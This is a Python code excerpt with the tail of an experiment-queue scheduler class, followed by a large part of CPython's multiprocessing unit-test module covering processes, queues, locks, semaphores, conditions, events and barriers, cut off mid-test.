self.logger.debug("System " + str(system_status[1])
+ " - Experiments: " + str(self.experiments_running)
+ " running, " + str(self.experiments_limit) + " max.")
if not system_status[0]:
time.sleep(5)
continue
experiment_id = self.dal.retrieve_experiment_from_queue()
if experiment_id:
self.logger.info("Retrieved experiment " + str(experiment_id) + " from queue.")
self.launch_experiment(experiment_id)
self.logger.info('Experiment ' + str(experiment_id) + ' launched!!')
else:
self.logger.info('Queue empty.')
time.sleep(5)
def monitor_running_experiments(self):
"""Check periodically if there is space in the pool
by querying current running experiments."""
while True:
time.sleep(10)
running_list = self.dal.get_running_experiments()
self.experiments_running = len(running_list["running"])
def check_system(self):
"""
Check the execution state of the system.
The size of the pool, the number of experiments running and the
activation of the system itself are checked periodically in order to
manage the execution of the experiments.
"""
system_config = self.dal.get_system_parameters()
self.is_running = system_config['running']
self.experiments_limit = system_config['experiments_limit']
if not self.is_running:
status = (False, 'paused')
elif self.experiments_running >= self.experiments_limit:
status = (False, 'full')
else:
status = (True, 'activated')
return status
def launch_experiment(self, experiment_id):
"""Launch the experiments stored in the execution queue."""
self.logger.debug('Saving the launch time')
launch_time = datetime.datetime.utcnow()
self.dal.update_experiment_state(experiment_id, 'pool')
self.dal.update_experiment_launch_time(experiment_id, launch_time)
experiment_info = self.dal.get_experiment(experiment_id)
self.logger.debug('Saving experiment in execution list')
self.dal.save_running_experiment(experiment_info)
self.logger.info('Launching experiment ' + str(experiment_id))
experiment = Experiment(
experiment_info, self.kafka_server, self.db, self.orch)
experiment.start()
self.experiments_running += 1
threading.Thread(target=experiment.control).start()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
def test_terminate(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
sys.stderr = open(testfn, 'w')
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
sys.stderr = open(testfn, 'w')
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason, code in (([1, 2, 3], 1), ('ignore this', 1)):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, code)
with open(testfn, 'r') as f:
self.assertEqual(f.read().rstrip(), str(reason))
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
for i in range(10):
try:
if get_value(woken) == 6:
break
except NotImplementedError:
break
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
f(*args)
b.wait_for_finished()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
